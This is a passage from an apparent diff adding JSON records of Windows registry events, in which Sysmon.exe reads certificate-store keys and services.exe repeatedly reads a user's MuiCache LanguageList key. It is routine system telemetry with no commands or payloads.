"CTLs", + "timestamp": 131883570849020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570849020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570849020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570849020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570849020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570849020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570849020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849020000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570849020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570849020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570849020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570849020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849020000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570849020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570849020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570849020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570849020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849020000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849020000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849020000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849020000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849020000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849020000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849020000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849020000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849020000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849020000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849020000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849020000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849020000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849020000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849020000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849020000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849020000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849020000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849020000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849020000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849020000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849020000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849020000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849020000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849020000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849020000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849180000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849180000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849180000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849180000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849180000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849180000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849180000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849180000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849180000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849180000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849180000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849180000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849180000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849180000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849180000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": 